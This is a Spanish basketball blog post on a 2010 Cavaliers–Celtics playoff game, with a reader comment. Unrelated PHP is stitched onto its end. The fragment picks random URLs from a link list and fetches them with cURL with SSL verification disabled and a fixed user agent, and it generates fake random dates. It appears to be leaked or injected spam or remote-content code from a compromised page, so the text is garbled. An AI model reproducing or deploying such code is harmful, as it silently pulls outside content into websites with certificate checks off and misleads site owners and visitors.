Playoffs 01/04/2010: Una sola jugada

02 de May de 2010 por txusma

Durante buena parte del partido los Celtics parecían capaces de llevarse el partido y como consecuencia provocar un interjección exclamativa en todos los aficionados que consultaran el resultado a posteriori. Gracias principalmente a un Rajon Rondo que se iba una y otra vez de Mo Williams y de quien le pusieran por delante, los Celtics llegaron a acumular una ventaja de 11 puntos a mediados del tercer cuarto. Lebron James parecía renqueante de su lesión en el codo, Mo Williams estaba desconectado del partido y Shaquille O’Neal demostraba con su lentitud todos y cada uno de los años que tenía. Pero a falta de 5 minutos para el final del tercer cuarto, una jugada cambió completamente el panorama: Mo Williams machacó en un contraataque a pesar de la oposición de Paul Pierce. Era la primera vez que hacía algo semejante en un partido de la NBA. A partir de ese momento 43-24 para los Cavs, y la sorpresa al traste. Hubo un amago de reacción verde en los últimos minutos pero fue sofocado por Shaquille O’Neal y sobretodo por Lebron James.

Ha sido un buen golpe sobre de la mesa de los Cavs que cuando se han visto hundidos han sacado lo mejor de sí mismos para meterles 19 puntos de diferencia a los Celtics. Y todo esto con Antawn Jamison sin aparecer en todo el partido pero lo cierto es que el banquillo de los Cavs ha sido más determinante que el de los Celtics que ha anotado 12 míseros puntos. Y hablamos de un banquillo con Michael Finley (¿daba miedo a algunos su fichaje?), Rasheed Wallace, Glen Davis o Nate Robinson. Lo de este último urge explicación por que si bien no pensábamos que fuera tan y tan buena como indicaban sus números en los Knicks no creemos que sea tan y tan malo como para no jugar ni un minutos con los Celtics. El Big Four necesitará la ayuda de todos sus compañeros si quieren poner algo de emoción a la eliminatoria.

PREMIOS

MVP: Lebron James ha acabado el partido con unos números muy típicos en él, 35 puntos, 7 rebotes y 7 asistencias. Lo hace tan a menudo que ya casi ni lo valoramos.

Sorpresa: Mo Williams ha resultado clave en esta victoria tanto o más que “King” James. Sus 14 puntos en el tercer cuarto (para un total de 20) con mate incluído han permitido a su equipo mantenerse vivo y finalmente lograr la remontada.

Decepción: Lo del banquillo de los Celtics no es de recibo y en un equipo tan veterano su aportación debería ser mucho más importante.

Esfuerzo en vano: Daba la impresión que Rajon Rondo acababa la temporada a un nivel bastante bajo pero lo cierto es que los Playoffs los está jugando al nivel acostumbrado. 27 puntos, 12 asistencias y 6 rebotes.

Y MAÑANA…

Se abre la eliminatoria entre Lakers y Jazz que se presenta apasionante y además podremos el séptimo partido de la Hawks – Bucks. Siendo en la ciudad de la coca-cola todas las apuestas dan como favoritos a Atlanta pero estos Bucks se han ganado el derecho a que se les tenga en cuenta hasta el último momento.

Comenta

Un comentario a esta entrada

  1. Love Denise dice:
    #1

    nate robinson es un expediente x , supongo que debe haber problemas extradeportivos o algo similar, por cierto, otro expediente x es que su camiseta sea la 11º más vendida de la NBA tras el ultimo recuento.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>